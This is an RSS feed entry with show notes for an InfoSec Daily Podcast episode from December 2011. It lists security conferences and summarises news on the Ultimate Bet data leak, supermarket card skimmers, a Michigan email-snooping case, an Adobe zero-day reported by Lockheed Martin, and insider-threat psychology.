		<link>http://www.isdpodcast.com/episode-540-ultimate-bet-lucky-supermarket-cuckold-hacking-lockheed-martin-targeted-insider-psychology</link>
		<comments>http://www.isdpodcast.com/episode-540-ultimate-bet-lucky-supermarket-cuckold-hacking-lockheed-martin-targeted-insider-psychology#comments</comments>
		<pubDate>Thu, 08 Dec 2011 01:57:47 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3245</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 540 for December 7, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, Karthik Rangarajan, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 540 for December 7, 2011. &nbsp;&nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, Karthik Rangarajan, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thotcon 0&#215;3</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Friday April 27th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Secret location in Chicago</span><br />
	<a href="http://tickets.thotcon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://tickets.thotcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ISC2 Offical Results: @WIMREMES WINS!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://threatpost.com/en_us/blogs/personal-information-35-million-poker-players-spilled-online-120611"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/personal-information-35-million-poker-players-spilled-online-120611</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Customers of the online poker Website Ultimate Bet (UB) are the victims of a data breach that spilled the private information of up to 3.5 million of its customers online over the weekend.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ultimate Bet, a property of the Cereus Poker Network, saw a slew of customer information posted online including players&#39; names, screen names, birth dates, e-mail addresses, phone numbers and mailing and IP addresses. Users&rsquo; UB account numbers were also found online in addition to their VIP, Affiliate and Blacklist statuses, all which are unique to the site. Customers&rsquo; credit card numbers and social security numbers don&rsquo;t appear to have been leaked in this particular incident.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to a report on</span><a href="http://www.pokernewsdaily.com/private-customer-data-leaked-from-ub-com-20702/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">PokerNewsDaily.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the information was initially posted on the Two Plus Two poker strategy forums and taken offline shortly after. Even though it was only available for a short period, the information was quickly copied and distributed across various online mediums.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://arstechnica.com/business/news/2011/12/hackers-hit-supermarket-self-checkout-lanes-steal-money-from-shoppers.ars"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/business/news/2011/12/hackers-hit-supermarket-self-checkout-lanes-steal-money-from-shoppers.ars</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Criminals have tampered with the credit and debit card readers at self-checkout lanes in more than 20 supermarkets operated by a California chain, allowing them to steal money from shoppers who used the compromised machines. The chain, Lucky Supermarkets, which is owned by Save Mart, is now inspecting the rest of its 234 stores in northern California and northern Nevada and urging customers who used self-checkout lanes to close their bank and credit card accounts.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lucky Supermarkets issued a consumer advisory Monday</span><a href="http://savemart.com/index.php?id=449"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">listing the stores confirmed to have been affected</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, while also saying, &quot;There have been approximately 80 employee and customer reports of either compromised account data or attempts to access account data, with the majority coming over this past weekend. &hellip; We strongly recommend our customers who used a self check-out lane in the affected stores contact their financial institution to close existing accounts and seek further advice. We continue to work with local, state, and federal law enforcement to find those responsible.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The</span><a href="http://www.mercurynews.com/breaking-news/ci_19480051"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Mercury News</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> reported today that Lucky Supermarkets has received more than 1,000 calls from customers saying they&#39;ve been victims of fraud. Lucky Supermarkets has been investigating the problem since November 11, when an employee performing routine maintenance on a self-checkout machine &quot;uncovered an extra computer board that had been placed inside the checkout machine, recording customers&#39; financial information,&quot; the paper said. When the supermarket chain initially warned customers on Nov. 23, there were not yet reports of accounts being compromised, but now they are pouring in. One San Jose resident told the </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mercury News</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that $300 had been withdrawn from her checking account.</span></p>
<p>
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.theregister.co.uk/2011/12/07/cuckold_hacking_charges/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/07/cuckold_hacking_charges/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Michigan appeals court is trying to decide whether the state&#39;s anti hacking law should be invoked against a man who broke into his wife&#39;s Gmail account to see if she was having an affair.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Leon Walker, 34, faces a maximum of five years in prison for</span><a href="http://www.theregister.co.uk/2010/12/29/cuckold_computer_tech_hacking_charges/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">using a shared family computer</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to read his wife&#39;s personal email after she failed to return home one night. It turns out Clara Walker was indeed involved with another man, who just happened to be her previous husband.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attorneys for Leon Walker told judges with the Michigan Court of Appeals that the law their client was charged under was ambiguous and was never intended for domestic matters. It was passed in 1979 and was designed to prevent identity and trade secret theft. They also warned if charges go forward the law could criminalize activities such as parents monitoring their children&#39;s online activities.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Judges hearing the case,</span><a href="http://www.usatoday.com/news/nation/story/2011-12-07/email-hacking-cheating/51698546/1"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">according to</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">USA Today</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, didn&#39;t sound so sure.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Your client is being charged with security intellectual property &ndash; her email, accessing her intellectual property,&quot; judge Pat Donofrio said.</span></p>
<p>
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://threatpost.com/en_us/blogs/adobe-zero-day-targets-lockheed-martin-120711"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/adobe-zero-day-targets-lockheed-martin-120711</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adobe said </span><a href="http://threatpost.com/en_us/blogs/adobe-warns-critical-zero-day-flaw-reader-and-acrobat-120611"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">a previously undisclosed vulnerability in its Reader and Acrobat applications</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> was passed along by defense contractor Lockheed Martin, raising the specter of a targeted attack on the important military supplier.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In issuing a warning about a critical flaw on Tuesday, Adobe credied both Lockheed Martin and the Defense Security Information Exchange (DSIE) with reporting the hole. Those following the industry closely say that the two organizations were likely targeted in an attack leveraging the zero-day.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;My guess is that they got targeted and reported it to Adobe,&rdquo; Mila Parkour of the Contagio Malware Dump blog told</span><a href="http://www.cio.com/article/696049/Hackers_Exploit_Adobe_Reader_Zero_Day_May_Be_Targeting_Defense_Contractors?source=rss_security&amp;utm_source=dlvr.it&amp;utm_medium=twitter"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ComputerWorld&rsquo;s Gregg Keizer</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adobe initially gave credit to MITRE (as well as Lockheed), but has since revised their security advisory, giving credit to the DSIE instead MITRE. All three organizations are part of Defense Industrial Base (or DIB), of which the DSIE is a subset. Numerous government reports in recent years have described a sustained and sophisticated campaign of hacks and online attacks on DIB members, with many trails leading back to the People&#39;s Republic of China and Russia. In November, the Office of the National Counterintelligence Executive made the U.S. government&#39;s boldest claims yet about the cyber spying, accusing both countries of conducting far flung cyber espionage campaigns against U.S. and other Western firms in an effort to promote domestic interests.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Neither Lockheed nor the DSIE responded to Keizer&#39;s requests for comment. Adobe is reportedly planning to ship a patch for this bug next week.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is the second time this year that Lockheed has appeared in security headlines. They hit the news earlier this year, after attackers leveraged SecureID Tokens stolen from RSA in a separate attack also involving Adobe.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.securityweek.com/finding-devil-inside-psychology-insider-threat"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securityweek.com/finding-devil-inside-psychology-insider-threat</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Identifying a potential malicious insider before he or she is able to walk away with intellectual property can be the difference between a good night&rsquo;s sleep and several weeks&rsquo; worth of public relations fallout. According to psychologists Dr. Eric Shaw and Harley Stock, there are</span><a href="https://symantecevents.verite.com/23823/129830"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">warning signs organizations can heed</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> if they know what to look for.</span></p>
<p>&nbsp;</p>
